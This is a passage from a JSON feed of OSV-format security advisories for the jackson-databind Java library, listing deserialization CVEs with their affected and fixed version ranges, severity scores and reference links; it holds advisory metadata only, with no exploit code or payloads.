"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191017-0006" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b2e23c94f9dfef53e04c492e5d02e5c75201734be7adc73a49ef2370@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a430dbc9be874c41314cc69e697384567a9a24025e819d9485547954@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7782a937c9259a58337ee36b2961f00e2d744feafc13084e176d0df5@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/GEODE-7255" }, { 
"type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3901" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-10-28T19:19:01Z", "nvd_published_at": "2019-10-01T17:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mx9v-gmh4-mgqw", "published": "2019-01-04T19:07:01Z", "modified": "2024-03-14T05:32:02.133724Z", "aliases": [ "CVE-2018-19361" ], "summary": "Deserialization of Untrusted Data in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the openjpa class from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-mx9v-gmh4-mgqw/GHSA-mx9v-gmh4-mgqw.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", 
"ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.8" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-mx9v-gmh4-mgqw/GHSA-mx9v-gmh4-mgqw.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-mx9v-gmh4-mgqw/GHSA-mx9v-gmh4-mgqw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19361" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2186" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mx9v-gmh4-mgqw" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/TINKERPOP-2121" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/107985" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:47:38Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p43x-xfjf-5jhr", "published": "2020-05-15T18:59:01Z", "modified": "2024-03-15T00:33:14.700288Z", "aliases": [ "CVE-2020-9548" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).", 
"affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-p43x-xfjf-5jhr/GHSA-p43x-xfjf-5jhr.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.6" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-p43x-xfjf-5jhr/GHSA-p43x-xfjf-5jhr.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.7.9.7" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", 
"2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-p43x-xfjf-5jhr/GHSA-p43x-xfjf-5jhr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9548" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2634" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/1e64db6a2fad331f96c7363fda3bc5f3dffa25bb" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200904-0006" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:24:13Z", "nvd_published_at": "2020-03-02T04:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q93h-jc49-78gg", "published": "2020-05-15T18:59:10Z", "modified": "2024-03-16T05:19:47.711015Z", "aliases": [ "CVE-2020-9547" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`).", "affected": [ { "package": { 
"name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q93h-jc49-78gg/GHSA-q93h-jc49-78gg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.6" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q93h-jc49-78gg/GHSA-q93h-jc49-78gg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.7.9.7" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", 
"2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q93h-jc49-78gg/GHSA-q93h-jc49-78gg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9547" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2634" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200904-0006" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-22T20:58:56Z", "nvd_published_at": "2020-03-02T04:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qjw2-hr98-qgfh", "published": "2021-12-09T19:15:36Z", "modified": "2024-02-18T05:20:56.894470Z", "aliases": [ "CVE-2020-24750" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.6.7.5 and from 2.7.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.4", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-qjw2-hr98-qgfh/GHSA-qjw2-hr98-qgfh.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.6" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.5", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-qjw2-hr98-qgfh/GHSA-qjw2-hr98-qgfh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24750" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2798" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/2118e71325486c68f089a9761c9d8a11b4ddd1cb" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/6cc9f1a1af323cd156f5668a47e43bab324ae16f" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ad5a630174f08d279504bc51ebba8772fd71b86b" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": 
"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201009-0003" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:41:09Z", "nvd_published_at": "2020-09-17T19:15:00Z", "severity": "HIGH" }, 